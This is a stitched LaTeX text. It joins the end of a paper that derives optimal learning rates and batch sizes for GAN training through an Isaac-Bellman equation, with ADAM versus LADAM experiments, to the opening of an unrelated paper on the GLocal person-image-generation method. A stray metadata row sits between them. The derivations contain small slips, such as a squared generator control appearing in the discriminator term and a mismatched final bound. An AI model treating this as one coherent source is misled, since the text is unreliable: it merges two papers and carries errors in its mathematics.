\begin{Assumption}
\begin{enumerate}[label = D.\arabic*]
\item There exists a constant $L^1$ such that for $\phi = g_w,\,g_\theta,\sigma_w,\,\sigma_\theta$, we have
\begin{equation*}
\begin{array}{ll}
\|\phi(w,\theta) - \phi(w',\theta')\| \leq L^1 \big(\|w - w'\| + \|\theta - \theta'\|\big),&\\
\|\phi(w,\theta)\|\leq L^1 \big(1 + \|w\| + \|\theta\|\big),&
\end{array}
\end{equation*}
for any $(w,w',\theta,\theta')\in \big(\mathbb{R}^{M}\big)^2 \times \big(\mathbb{R}^{N}\big)^2$.
\item There exists a constant $K^1$ such that
\begin{equation*}
|g(w,\theta)| \leq K^1 \big(1 + \|w\|^2 + \|\theta\|^2 \big), \, \forall (w,\theta)\in \mathbb{R}^{M}\times \mathbb{R}^{N}.
\end{equation*}
\end{enumerate}
\label{Assump:D}
\end{Assumption}
In particular, it is clear that the value function $v$ is a solution to the following Isaac-Bellman equation
\begin{equation}
\left\{
\begin{array}{ll}
v_t + \max\min_{(u^w, u^\theta \in [u^{\min},u^{\max}])} & \big\{\big(u^w g_{w}^\top v_w - u^{\theta} g_{\theta}^\top v_\theta \big)\vspace{0.2cm}\\
& \hspace{-4cm}+ \frac{1}{2} \big[ (u^w)^2 (\bar{\Sigma}^w:v_{ww}) + (u^\theta)^2 (\bar{\Sigma}^\theta:v_{\theta \theta})\big]\big\} = 0, \vspace{0.2cm}\\
v(T,\cdot) = g(\cdot),&
\end{array}
\right.
\label{Eq:valfct_diffeq01}
\end{equation}
with $A:B = {\text{Tr}}[A^\top B]$ for any real matrices $A$ and $B$. More precisely, we have
\begin{prop}
Assume Assumption \ref{Assump:D}. Then
\begin{itemize}
\item The value function $v$ defined in \eqref{Eq:ValFunctDef} is the unique viscosity solution of \eqref{Eq:valfct_diffeq01}.
\item When $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$, the optimal learning rate $\bar{u}^w$ and $\bar{u}^\theta$ are given by
\begin{align*}
\hspace{0.5cm}
\bar{u}^w(t) = \left\{
\begin{array}{lll}
u^{\min} \vee \left( u^{w*}(t)\wedge u^{\max}\right), & \hspace{0.2cm} & \text{if } \, \left(\bar{\Sigma}^w:v_{ww}\right)\big(t,q(t)\big) < 0,\\
\\
u^{\max}, & \hspace{0.2cm} & \text{if } \, |u^{\max}-u^{w*}(t)| \geq |u^{\min}-u^{w*}(t)|,\\
\\
u^{\min}, & \hspace{0.2cm} & \text{otherwise,}
\end{array}
\right.
\end{align*}
and
\begin{align*}
\bar{u}^\theta(t) = \left\{
\begin{array}{lll}
u^{\min} \vee \left( u^{\theta*}(t) \wedge u^{\max} \right), & \hspace{0.2cm} & \text{if }\, \left(\bar{\Sigma}^\theta:v_{\theta \theta}\right) \big(t,q(t)\big) > 0,\\
\\
u^{\max}, & \hspace{0.2cm} & \text{if } \, |u^{\max}-u^{\theta*}(t)| \geq |u^{\min}-u^{\theta*}(t)|,\\
\\
u^{\min}, & \hspace{0.2cm} & \text{otherwise,}
\end{array}
\right.
\end{align*}
with $u^{w*}(t) = \left(\cfrac{-g_{w}^\top v_w}{\bar{\Sigma}^w:v_{ww}}\right)\big(t,q(t)\big)$, $ u^{\theta*}(t) = \left(\cfrac{g_{\theta}^\top v_\theta}{\bar{\Sigma}^\theta:v_{\theta \theta}} \right)\big(t,q(t)\big)$, and $\bar{\Sigma}^w$ and $\bar{\Sigma}^\theta$ as
\begin{equation*}
\left\{
\begin{array}{lll}
\bar{\Sigma}^w (t,q) = \{\bar{\sigma}^w_t (\bar{\sigma}^{w}_t)^{\top}\}(q), & \bar{\Sigma}^\theta(t,q) = \{\bar{\sigma}^\theta_t (\bar{\sigma}^{\theta})^{\top}_t\}(q),&\\
\\
\bar{\sigma}^w_t (q) = \sqrt{\bar{\eta}^w(t)} \sigma^w (q), & \bar{\sigma}^\theta_t (q) = \sqrt{\bar{\eta}^\theta(t)} \sigma^\theta(q),&
\end{array}
\right.
\end{equation*}
for any $t \in \mathbb{R}_+$, and $q = (w,\theta)\in \mathbb{R}^{M}\times \mathbb{R}^{N}$.
\end{itemize}
\label{Prop:OptiLR}
\end{prop}
\begin{proof}{(For Proposition \ref{Prop:OptiLR}).}
Since Assumption \ref{Assump:D} holds, one can simply use Proposition \ref{prop0:Visco_sol} to show that $v$ is the unique viscosity solution of \eqref{Eq:valfct_diffeq01}. Moreover, the control $\bar{u}^w(t)$ maximizes the quadratic function $u : \rightarrow u \big( g_{w}^\top v_w \big) ( t,q(t) ) + \frac{1}{2} u^2 \big( \bar{\Sigma}^w:v_{ww}\big) ( t,q(t) )$, and similarly the control $\bar{u}_t^\theta $ minimizes $u : \rightarrow -u \big( g_{\theta}^\top v_\theta \big) ( t,q(t) ) + \frac{1}{2} u^2 \big(\bar{\Sigma}^\theta:v_{\theta \theta}\big) ( t,q(t) )$. Direct computation completes the proof.
\end{proof}
\paragraph{Learning rate and GANs training.}
\manuallabel{sec:LRAndDivergence}{3.2}
Now we can see the explicit dependency of optimal learning rate on the convexity of the objective function, and its relation to Newton's algorithm. Specifically, \begin{itemize}
\item Proposition \ref{Prop:OptiLR} provides a two-step scheme for the selection of the optimal learning rate
\begin{enumerate}[label = Step \arabic*., leftmargin = 1.5cm]
\item Use the Isaac-Bellman equation to get $\bar{u} = (\bar{u}^w,\bar{u}^\theta)$
\item Given $\bar{u}$, apply the gradient algorithm with the optimal learning rate $\bar{u} \bullet \bar{\eta}$.
\end{enumerate}
\item To get the expression of the optimal adaptive learning rate in Proposition \ref{Prop:OptiLR}, we need some regularity conditions on the value function $v$ such as $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$. Conditions for such a regularity can be found in
\citep{pimentel2019regularity}.
\item When the value function $v$ does not satisfy the regularity requirement $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$, it is standard to use discrete time approximations \citep{barles1991convergence,kushner2001numerical,wang2008maximal}. Note that these approximations are shown to converge towards the value function.
\item The introduction of the clipping parameter $u^{\max}$ is closely related to the convexity issue discussed for GANs in Section \ref{sec:GANsTrainConv}. When the convexity condition $\bar{\Sigma}^w:v_{ww} < 0$ is violated, the learning rate takes the maximum value $u^{\max}$ or minimum value $u^{\min}$ to escape as quickly as possible from this non-concave region. The clipping parameter $u^{\max}$ is also used to prevent explosion in GANs training. Conditions under which explosion occurs are detailed in Proposition \ref{Prop:LRDivergence}.
\item The control $(\bar{u}^w,\bar{u}^\theta)$ of Proposition \ref{Prop:OptiLR} is closely related to the standard Newton algorithm. To see this, take $\bar{\eta} = (1,1)$, $M = N = 1$, $\sigma^w = g_w$, $ \sigma^\theta = g_\theta$, and replace the value function $v$ by the suboptimal choice $g$. For such a configuration of the parameters and with the convexity conditions
$$
\hspace{-0.6cm}\big(\bar{\Sigma}^w:v_{ww}\big) = |g_w|^2 g_{ww} < 0, \quad \big(\bar{\Sigma}^\theta:v_{\theta \theta}\big) = |g_\theta|^2 g_{\theta \theta}> 0,
$$
the controls $\bar{u}^w$ and $\bar{u}^\theta$ become
\begin{equation}
\hspace{-0.6cm}\bar{u}^w(t) = u^{\min} \vee \cfrac{-1}{ \bar{\eta}^w(t) g_{ww}(q(t))} \wedge u^{\max}, \quad \bar{u}^\theta (t) = u^{\min} \vee \cfrac{1}{ \bar{\eta}^\theta(t) g_{\theta \theta}(q(t))} \wedge u^{\max}.
\label{Eq:ConnecNewtAlgo}
\end{equation}
In absence of the clipping parameters $u^{\max}$ and $u^{\min}$, the variables $\bar{u}^w$ and $\bar{u}^\theta$ are exactly the ones used for Newton's algorithm.
\end{itemize}
\paragraph{Learning rate and GANs convergence revisited.}
We can now further analyze the impact of the learning rate on the convergence of GANs, generalizing the example of Section \ref{sec:GANTrainParamTun} in which poor choices of the learning rate destroy the convergence.\\
Let $\epsilon > 0$, and $\tilde{u} = (\tilde{u}^w,\tilde{u}^\theta)$ be
$$
\tilde{u}(t) = \left(\cfrac{-2 |g_{w}|^2 }{\bar{\Sigma}^w:g_{ww}},\, \cfrac{2|g_{\theta}|^2}{\bar{\Sigma}^\theta:g_{\theta \theta}}\right) \big(t,q(t)\big), \qquad \forall t \geq 0.
$$
We assume the existence of $\gamma>0$ such that
$$
\gamma \leq -\left(\bar{\Sigma}^w:g_{ww}\right)(t,q), \qquad \gamma \leq \left(\bar{\Sigma}^\theta:g_{\theta \theta}\right)(t,q),
$$
for every $t\geq 0$, and $q = (w,\theta) \in \mathbb{R}^{M} \times \mathbb{R}^{N}$. Then,
\begin{prop}
For any control process $u = (u^{w},u^{\theta}) \in \mathcal{U}^w \times \mathcal{U}^\theta$ such that
\begin{itemize}
\item $u^{w} \geq (\tilde{u}^w \vee 1) + \epsilon$, there exists $\tilde{\epsilon} > 0$ satisfying
\begin{align*}
J(T,0,q_0;u) &\leq -\tilde{\epsilon} \times T + \mathbb{E}\left[ \int_{0}^T \big\{ - u^{\theta} |g_{\theta}|^2 + \frac{1}{2} (u^\theta)^2 (\bar{\Sigma}^\theta:g_{\theta \theta})\big\}\big(s,q(s)\big)\,ds|q_0\right]\\
& = -\tilde{\epsilon} \times T + L^1(T,q_0;u),
\numberthis\label{Eq:expl1}
\end{align*}
for any $(T,q_0) \in \mathbb{R}_+\times \mathbb{R}^{M+N}$.
\item $u^{\theta} \geq (\bar{u}^\theta \vee 1) + \epsilon$, there exists $\tilde{\epsilon} > 0$ such that
\begin{align*}
J(T,0,q_0;u) &\geq \tilde{\epsilon} \times T + \mathbb{E}\left[ \int_{0}^T \big\{ u^{w} |g_{w}|^2 + \frac{1}{2} (u^w)^2 (\bar{\Sigma}^w:g_{ww})\big\}\big(s,q(s)\big)\,ds|q_0\right]\\
& = \tilde{\epsilon} \times T + L^2(T,q_0;u),
\numberthis \label{Eq:expl2}
\end{align*}
for any $(T,q_0) \in \mathbb{R}_+\times \mathbb{R}^{M+N}$.
\end{itemize}
\label{Prop:LRDivergence}
\end{prop}
Note that inequality \eqref{Eq:expl1} shows that \begin{equation}
J(T,0,q_0;u) \underset{T \rightarrow \infty}{\rightarrow} - \infty,
\label{Eq:Expl_explicit1}
\end{equation}
for any $q_0 \in \mathbb{R}^{M+N}$ satisfying $\lim\sup_{T \rightarrow \infty} L^1(T,q_0;u) < +\infty$. Similarly, inequality \eqref{Eq:expl2} gives
\begin{equation}
J(T,0,q_0;u) \underset{t \rightarrow \infty}{\rightarrow} + \infty,
\label{Eq:Expl_explicit2}
\end{equation}
for every $q_0 \in \mathbb{R}^{M+N}$ such that $\lim\inf_{T \rightarrow \infty} L^2(T,q_0;u) > -\infty$. Thus, Equations \eqref{Eq:Expl_explicit1} and \eqref{Eq:Expl_explicit2} guarantee the explosion of the reward function without proper choices of the learning rate.
\begin{proof}{(For Proposition \ref{Prop:LRDivergence}).}
Since the proofs of inequalities \eqref{Eq:expl1} and \eqref{Eq:expl2} are similar, we will only prove \eqref{Eq:expl1}. Let $(T,q_0) \in \mathbb{R}_+ \times \mathbb{R}^{M+N}$. By It\^{o}'s formula and the SDE \eqref{Eq:sde2} for the process $(q(t))_{t \geq 0}$, we get
\begin{align*}
\partial_T J(T,0,q_0;u) & = \mathbb{E}\big[\big\{\big( u^w |g_{w}|^2 - u^{\theta} |g_{\theta}|^2 \big) \\
& \hspace{-2.2cm} + \frac{1}{2} \big[ (u^w)^2 (\bar{\Sigma}^w:g_{ww}) + (u^w)^2 (\bar{\Sigma}^\theta:g_{\theta \theta})\big]\,\big\} \big(T,q(T)\big)|q_0\big] \\
&\hspace{-2.25cm} = \mathbb{E} \big[h^1\big(T,q(T);u^w(T)\big) \big] + \mathbb{E} \big[h^2 \big(T,q(T);u^\theta(T)\big) \big],
\end{align*}
with
$$
h^1(t,q;u) = u |g_{w}|^2(q) + \frac{1}{2} (u)^2 (\bar{\Sigma}^w:g_{ww})(t,q),
$$
and
$$
h^2(t,q;u) = -u |g_{\theta}|^2(q) + \frac{1}{2} (u)^2 (\bar{\Sigma}^\theta:g_{\theta \theta})(t,q),
$$
for any $(t,q,u) \in \mathbb{R}_+ \times \mathbb{R}^{M+N} \times [0,u^{\max}]$. Using
$$
\gamma \leq -(\bar{\Sigma}^w:g_{ww})(t,q),
$$
for every $(t,q) \in \mathbb{R}_+ \times \mathbb{R}^{M+N}$, and $u^{w} \geq (\tilde{u}^w \vee 1) + \epsilon$ almost surely, we obtain\footnote{Note that the convexity condition $(\bar{\Sigma}^w:g_{ww}) \leq 0$ is in force.}
\begin{align*}
\mathbb{E}\big[h^1\big(T,q(T);u^{w}(T)\big)\big] & = \mathbb{E}\big[ \big(a\, u^{w} ( u^{w} - \tilde{u}^w ) \big) (T) \big] \\
& \hspace{-1.7cm}\leq -(\gamma/2) \mathbb{E}[u^{w} (T)] \epsilon \leq - (\gamma/2) (1 + \epsilon) \epsilon = -\tilde{\epsilon},
\end{align*}
with $a(T) = \cfrac{(\bar{\Sigma}^w:g_{ww})(T,q(T))}{2}$.
Thus,
\begin{align*}
\partial_T J(T,0,q_0;u)\leq -\tilde{\epsilon} + \mathbb{E}\big[ h^2\big( T, q(T);u^\theta(T) \big) \big],
\end{align*}
which ensures that
\begin{align*}
J (T, 0, q_0;u) \leq -\tilde{\epsilon} T + L^{\theta},
\end{align*}
for all $T \geq 0$.
\end{proof}
\subsection{Optimal Batch Size}
\manuallabel{sec:batch_size}{5.2}
The optimal batch size problem can be formulated and analyzed by following the same approach of Section \ref{sec:OptLearningRate}.
\begin{prop}
Under Assumption \ref{Assump:D},
\begin{itemize}
\item The value function $v$ solving the batch size problem \eqref{Eq:ValFunctDef23} is the unique viscosity solution of the following equation:
\begin{equation}
\left\{
\begin{array}{ll}
v_t + \min_{m^\theta \in [1,m^{\max}]} \left\{\cfrac{\big( g_{w}^\top v_w - g_{\theta}^\top v_\theta \big)}{ m^\theta} + \cfrac{\left[ (\bar{\Sigma}^w:v_{ww}) + (\bar{\Sigma}^\theta:v_{\theta \theta})\right] }{2 (m^\theta)^2} \right\} = 0, \\
v(T,\cdot) = g(\cdot),&
\end{array}
\right.
\label{Eq:HJB_BS_prop}
\end{equation}
where $m^\theta$ controls the generator batch size and $m^{\max}$ is an upper bound representing the maximum batch size.
\item When $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$, the optimal control $\bar{m}^\theta$ is given by
\begin{align*}
\bar{m}^\theta(t) = \left\{
\begin{array}{ll}
1 \vee \left( m^{*}(t) \wedge m^{\max}\right), & \text{if }\, \left( (\bar{\Sigma}^w:v_{ww}) + (\bar{\Sigma}^\theta:v_{\theta \theta}) \right) \big(t,q(t)\big) > 0, \\
\\
m^{\max}, & \text{if } \, \big| \big( m^{\max} \big)^{-1} - \big( m^{*}(t) \big)^{-1} \big| \geq \big| 1 - \big( m^{*}(t) \big)^{-1} \big|,\\
\\
1, & \text{otherwise,}\\
\end{array}
\right.
\end{align*}
with $m^{*}(t) = \left( \cfrac{ (\bar{\Sigma}^w:v_{ww}) + (\bar{\Sigma}^\theta:v_{\theta \theta}) }{ g_{w}^\top v_w - g_{\theta}^\top v_\theta } \right) \big(t,q(t)\big)$.
\end{itemize}
\label{Prop:OptiBS}
\end{prop}
The proof of Proposition \ref{Prop:OptiBS} is omitted since it is very similar to the one of Proposition \ref{Prop:OptiLR}.
\paragraph{Some remarks.} We observe that
\begin{itemize}
\item Proposition \ref{Prop:OptiBS}, in the same spirit of Proposition \ref{Prop:OptiLR}, suggests a two-step approach for the implementation of the optimal batch size. First, estimate $\bar{m}^\theta$ using Equation \eqref{Eq:HJB_BS_prop}. Second, apply the gradient algorithm with $\bar{m}^\theta$.
\item The expression of the optimal batch size is given under the regularity condition $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$. It is possible to show that $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$ when $g$ and the volatility $\bar{\sigma}$ satisfy simple Lipschitz continuity conditions (see \citep{evans1983classical} for more details). Finally, when $v$ does not satisfy the regularity assumption $v \in \mathcal{C}^{1,2}([0,T],\mathbb{R}^M \times \mathbb{R}^N)$, it is standard to use discrete time approximations (see Section \ref{sec:OptLearningRate} for more details).
\item The convexity condition $(\bar{\Sigma}^w:v_{ww}) + (\bar{\Sigma}^\theta:v_{\theta \theta})$ involved in the expression of $\bar{m}^\theta$ is the aggregation of the generator component $(\bar{\Sigma}^w:v_{ww})$ and the discriminator one $(\bar{\Sigma}^\theta:v_{\theta \theta})$. Moreover, the clipping parameters $1$ and $m^{\max}$ are used to prevent either gradient explosion or vanishing gradient.
\end{itemize}
\section{Numerical Experiment}
\label{sec:Exp}
In this section, we compare a well-known and established algorithm, the ADAM optimizer, with its adaptive learning rate counterpart which we call LADAM. The implementation of the adaptive learning rate is detailed in Section \ref{lrAlgoDesign}. We use three numerical examples to compare the convergence speed of these algorithms: generation of Gaussian distributions, generation of Student t-distributions, and financial time series generation.
\subsection{Optimizer Design}
\manuallabel{lrAlgoDesign}{6.1}
For computational efficiency, instead of directly applying the two-step resolution scheme introduced in Section \ref{sec:OptLearningRate} for high dimensional Isaac-Bellman equation, we exploit the connection between the optimal learning rate and Newton's algorithm by following the methodology illustrated in Equation \eqref{Eq:ConnecNewtAlgo}. The main idea is to approximate the function $v$, introduced in Equation \eqref{Eq:ValFunctDef}, by $g$.\\
Furthermore, we divide all the parameters into $M$ sets. For example, for neural networks, one may associate a unique set to each layer of the network. For each set $i$, denote by $x^i_t$ the value at iteration $t \in \mathbb{N}$ of the set's parameters and write $g_{x^i}$ for the gradient of the loss $g$ with respect to the parameters of the set $i$. Then, we replace for each set $i$ the update rule
\begin{equation*}
x^i_{t+1} = x^i_{t} - \bar{\eta}_t g_{x^i}(x^i_{t}) ,
\end{equation*}
with $\bar{\eta}_t$ a base reference learning rate that depends on the optimizer, by the following update rule:
\begin{equation*}
x^i_{t+1} = x^i_t - u^i_t \big(\bar{\eta}_t g_{x^i}(x^i_{t}) \big),
\end{equation*}
where the adjustment $u^i_t$, derived from Proposition \ref{Prop:OptiLR}, is defined as follows:
$$ u^i_t = u^{\min} \vee \cfrac{\|g_{x^i}(x^i_{t})\|^2}{{\text{Tr}}[(\bar{g}_{x^i} \bar{g}_{x^i}^\top) g_{x^ix^i}](x^i_{t})} \wedge u^{\max}
$$
if $\big({\text{Tr}}[( \bar{g}_{x^i} \bar{g}_{x^i}^\top ) g_{x^ix^i}]\big)(x^i_{t}) > 0$;
otherwise
$u^i_t= u^{\max}$.
Here $\bar{g}_{x^i} = \sqrt{\bar{\eta}_t} g_{x^i}$ and $u^{\max}$ (resp. $u^{\min}$) is the maximum (resp. minimum) allowed adjustment. Note that the same adjustment $u^i_t$ is used for all parameters of the set $i$. The most expensive operation here is the computation of the term $\big({\text{Tr}}[(g_{x^i} g_{x^i}^\top) g_{x^ix^i}]\big)(x^i_{t})$ since we need to approximate the Hessian matrix $g_{x^ix^i}$.
\subsection{Vanilla GANs Revisited}
We use the vanilla GANs in Section \ref{sec:GAN_wellpos} to show the relevance of our adaptive learning rate and the influence of the batch size on GANs training.
\paragraph{Data.} The numerical samples of $X$ are drawn either from the Gaussian distribution $N(m,\sigma^2)$ with $(m,\sigma) = (3,1)$ or the translated Student t-distribution $a + T(n)$ where $a = 3$, and $T(n)$ is a standard Student t-distribution with $n$ degrees of freedom. The noise $Z$ always follows $N(0,1)$. These samples are then decomposed into two sets: a training set and a test set. In the experiment, one epoch refers to the number of gradient updates needed to pass the entire training dataset. \\
At the end of the training, the discriminator accuracy is expected to be around $50\%$, meaning that the generator manages to produce samples that fool the discriminator who is unable to differentiate the original data from the fake ones.
\paragraph{Network architecture description.} We work here under the same setting of Section \ref{sec:GAN_wellpos}, with discriminator detailed in Equation \eqref{Eq:simple_model} while the generator is composed of the following two layers: the first layer is linear, and the second one is convolutional. Both layers use the ReLU activation function.
\subsubsection{Gaussian Distribution Generation}
\manuallabel{numres}{6.2.1}
Here the input samples $X$ are drawn from $N(3,1)$. We first compare the accuracy of the discriminator for two choices of the optimizers, namely the standard ADAM optimizer and the ADAM optimizer with adaptive learning rates (i.e., LADAM). Figure \ref{Fig:Plot_accuracy_discriminator_sgdlsgd} plots the accuracy of the discriminator when the base learning rate varies for ADAM and LADAM. Evidently, a bigger learning rate yields faster convergence for both optimizers; LADAM outperforms ADAM due to the introduction of the adaptive learning rate, and more importantly, LADAM performance is more robust with respect to the initial learning rate since it can adjust using the additional adaptive component.
\begin{figure}[h!]
\center
(a) Discriminator accuracy ADAM \hspace{1.5cm} (b) Discriminator accuracy LADAM \\
\includegraphics[width=0.45\textwidth]{readf_res_gan_allrun4_adam_lrvary_sameGrid.pdf}
\includegraphics[width=0.45\textwidth]{readf_res_gan_allrun4_ladam_lrvary_sameGrid.pdf}
\caption{Discriminator accuracy for ADAM with a base learning rate in (a) and LADAM with an adaptive learning rate in (b)}
\label{Fig:Plot_accuracy_discriminator_sgdlsgd}
\end{figure}
Next, we analyze the generator loss for ADAM and LADAM optimizers. Figure \ref{Fig:Plot_loss_generator_sgdlsgd} shows the variations of the generator loss when moving the base learning rate for these optimizers. First, one can see that the loss decreases faster when using LADAM. Second, Figure \ref{Fig:Plot_loss_generator_sgdlsgd} confirms the robustness of LADAM with respect to the choice of the initial learning rate, again thanks to the additional adaptive learning rate component.
\begin{figure}[h!]
\center
(a) Generator loss ADAM \hspace{1.5cm} (b) Generator loss LADAM \\
\includegraphics[width=0.45\textwidth]{readf_res_gan_allrun4_adam_gloss_lrvary_sameGrid.pdf} \includegraphics[width=0.45\textwidth]{readf_res_gan_allrun4_ladam_gloss_lrvary_sameGrid.pdf}
\caption{Generator loss for ADAM with a base learning rate in (a) and LADAM with an adaptive learning rate in (b).}
\label{Fig:Plot_loss_generator_sgdlsgd}
\end{figure}
\subsubsection{Student T- Distribution Generation}
We repeat the same experiments of Section \ref{numres} but with different inputs data. Here, the input samples $X$ are drawn from the translated Student t-distribution $3 + T(3)$ where $T(3)$ is a standard Student t-distribution with $3$ degrees of freedom. Figures \ref{Fig:Plot_accuracy_discriminator_sgdlsgdStudent} and \ref{Fig:Plot_loss_generator_sgdlsgdStudent} display the discriminator accuracy and generator loss for both ADAM and LADAM. One can see that conclusions of Section \ref{numres} still hold, namely LADAM offers better performance, and is more robust with respect to the choice of the initial learning rate.
\begin{figure}[h!]
\center
(a) Discriminator accuracy ADAM \hspace{1.5cm} (b) Discriminator accuracy LADAM \\
\includegraphics[width=0.45\textwidth]{AccDiscrimLrvaryAllSameGrid.pdf}
\includegraphics[width=0.45\textwidth]{AccDiscrimLrvaryAllSameGridLadam.pdf}
\caption{Discriminator accuracy for ADAM with a base learning rate in (a) and LADAM with an additional adaptive learning rate component in (b).}
\label{Fig:Plot_accuracy_discriminator_sgdlsgdStudent}
\end{figure}
\begin{figure}[h!]
\center
(a) Generator loss ADAM \hspace{1.5cm} (b) Generator loss LADAM \\
\includegraphics[width=0.45\textwidth]{GlossLrvaryAllSameGrid.pdf} \includegraphics[width=0.45\textwidth]{GlossLrvaryAllSameGridLadam.pdf}
\caption{Generator loss for ADAM with a base learning rate in (a) and LADAM with an additional adaptive learning rate component in (b).}
\label{Fig:Plot_loss_generator_sgdlsgdStudent}
\end{figure}
\subsection{Financial Time Series Generation}
\paragraph{Data.} Data used here is taken from Quandl Wiki Prices database, which offers stock prices, dividends, and splits for 3000 US publicly-traded companies. In the numerical analysis, we will focus on the following six stocks: Boeing, Caterpillar, Walt Disney, General Electric, IBM, and Coca-Cola. For each stock, key quantities such as the traded volume, the open and close prices are daily recorded. The studied time period starts from January, 2000 and ends in March, 2018.
\paragraph{Network architecture description.} The neural network architecture is borrowed from \citep{yoon2019time}. It consists of four network components: an embedding function, a recovery function, a sequence generator, and a sequence discriminator. The key idea is to jointly train the auto-encoding components (i.e., the embedding and the recovery functions) with the adversarial components (i.e., the discriminator and the generator networks) in order to learn how to encode features and to generate data at the same time.
\paragraph{Numerical results.} Figure \ref{Fig:Plot_loss_generator_acc_discrim_TimeGan} plots the discriminator accuracy for the two following optimizers: the standard ADAM optimizer, and the same ADAM optimizer with an adaptive learning rate, which we call LADAM. We fix the base learning rate here to be $5 \cdot 10^{-4}$ since the best performance for ADAM is obtained with this value.\\
Figure \ref{Fig:Plot_loss_generator_acc_discrim_TimeGan} clearly shows that both accuracy and loss of LADAM converge faster than those of ADAM. This is mainly due to the adaptive learning component which controls how fast the algorithm moves in the gradient direction. Moreover, Figure \ref{Fig:Plot_loss_generator_acc_discrim_TimeGan}.b reveals that the loss from LADAM is more stable (i.e., with less fluctuations) than that from ADAM. Such a behavior is expected since LADAM incorporates the convexity of the loss function in its choice of the learning rate.
\begin{figure}[h!]
\center
\hspace{-2.cm} (a) Discriminator accuracy \hspace{1.5cm} (b) Generator loss \\
\includegraphics[width=0.45\textwidth]{Final_DAcc_0011.pdf} \includegraphics[width=0.45\textwidth]{Final_GLossS_0011.pdf}
\caption{Discriminator accuracy for ADAM and LADAM in (a), and generator loss for ADAM and LADAM in (b).}
\label{Fig:Plot_loss_generator_acc_discrim_TimeGan}
\end{figure}
\newpage
| 2024-02-18T23:40:11.310Z | 2021-12-28T02:28:39.000Z | algebraic_stack_train_0000 | 1,578 | 14,738 |
|
proofpile-arXiv_065-7758 | \section{Introduction}
\noindent Person image generation aims to generate realistic person image with target pose while keeping the source appearance unchanged, which is a popular task in the community of computer vision with applications like image editing and image animation. Perennial research efforts have contributed to impressive performance gain on challenging benchmark. \\
\indent Essentially, the person image generation involves the deformation of human body in 3D space, which poses an ill-posed problem given just the 2D image and pose inputs. The limitation of 2D modeling nature leads to tough challenges due to the following difficulties: (i) the prediction of invisible parts in the source caused by occlusion or corruption as shown in Figure~\ref{fig:overview}, (ii) retaining the spatial structure of visible source texture. The exploration of these issues has contributed to the development and progress of this field.\\
\indent Existing works like~\cite{ma2017pose,pumarola2018unsupervised,chan2019everybody} propose solutions within the common image-to-image translation framework, which directly feed the conditioning pose and human image as encoder-decoder inputs. Thus it is unable to utilize the appearance correspondence between the input and target image. To achieve better rearrangement of source appearance, warping-based~\cite{dong2018soft, siarohin2018deformable,tang2021structure, li2019dense,liu2019liquid,ren2020deep} methods have been proposed. However, these operations struggle in recovering structural details by solely relying on the point-wise mapping and incur a defect when dealing with unmatched occlusion regions. Recent works~\cite{men2020controllable, zhang2021pise} apply semantic normalization techniques such as AdaIN~\cite{men2020controllable}, SEAN~\cite{zhu2020sean} to the semantic details restoration in the target. However, the non-discriminatory treatment of the occluded and non-occluded regions introduces misleading information and its capability to preserve structural details is not fully exploited.\\
\indent This paper presents \textbf{GLocal}, a scheme to preserve the semantic and structural information with \textbf{G}lobal Graph Reasoning (GGR) and \textbf{Local} Structure Transfer (LST), respectively. Inspired by the fact that the invisible area estimation can be facilitated by visible area (e.g. if the hand is unseen in the source image, its color can still be estimated by the neck skin), we manage to estimate the occluded region style by modeling the internal relationships among different semantic regions. The relationships are built with a graph architecture based on the linkage of each part, whose graph nodes are filled with per-region styles. Thereby the invisible area's style representation can be inferred by our GGR. After acquiring the global statistics of the source, we seek to reproduce source's local structure with LST since local structure can indicate how the image details are organized and is better than isolated points. We achieve this by predicting style parameters of the source from local correlation map and transferring the structural information of the source style to the generation features with LocConv. Our contributions can be summarized as follows:
\begin{itemize}
\item We propose GGR module to estimate the occluded region style with global reasoning in person image generation, which conveys visible style information to the invisible area along with the graph structure according to the connectivity of human body.
\item We design LST module to extract local structure and transfer it into the generated result, which sharpens the generation result and leads to better detail conservation.
\item Extensive experiments show that our method achieves superior performance on the challenging DeepFashion dataset both qualitatively and quantitatively.
\end{itemize}
\begin{figure*}[t]
\centering
\includegraphics[width=0.9\linewidth]{figs/framework.pdf}
\caption{An overview of our GLocal framework. We first predict the target segmentation map $S_g$ from Semantic Prediction. Then we get the \textit{warping flow} $W$ and \textit{visibility map} $m_{vis}$ from a pretrained 3D flow estimation network~\cite{li2019dense}. We mark the visible and invisible positions with green and red in $m_{vis}$ respectively. After fusing the encoded target and warped source features, we can inject the source style into relevant regions within GGR module precisely. Finally, in the LST module, we transfer the local structure from source to generated result and send it into the decode to reconstruct the final image.}
\label{fig:framework}
\end{figure*}
\section{Related Work}
\subsection{Person Image Generation}
Person image generation is a valuable branch of the mainstream image generation field, which focuses on the human-specific generation task. As a milestone, ~\cite{ma2017pose} first shows that conditional GAN (cGAN) can generate desired person images. Extending this idea, several following works seek to improve cGAN's performance with techniques such as unsupervised training~\cite{pumarola2018unsupervised}, cycle training~\cite{tang2020bipartite}, coarse-to-fine strategy~\cite{wei2020gac}, and progressive training~\cite{zhu2019progressive,liu2020pose}, etc. However, these methods ignore the vanilla conditional GAN's incapability to model the relationship on the large pose misalignment. To better achieve spatial rearrangement, ~\cite{siarohin2018deformable} decomposes the translation between different poses into local affine transformations. Approaches such as ~\cite{li2019dense, Wei_Xu_Shen_Huang_2021, Tang_Yuan_Shao_Liu_Wang_Zhou_2021, liu2019liquid, ren2020deep} turn to estimate the appearance flow to align the source appearance with the target. Although warping the source can alleviate the aforementioned problem, they cannot deal with the occluded-region estimation for their false assumption that pixel-to-pixel warping transformation exists between source and target. Recently, emerging modulation-based methods~\cite{zhang2021pise, lv2021learning} adopt the two-stage pipeline, which first predict the segmentation map to extract region-wise image styles, and then use them to guide region synthesis with corresponding style injection. Unfortunately, this strategy cannot extract appropriate styles for occluded regions, and thus still fails to synthesize them. Different from previous methods, our global graph reasoning module can mitigate the occluded texture generation issues and achieve better structural preservation of the source in the target.
\subsection{Semantic Image Generation}
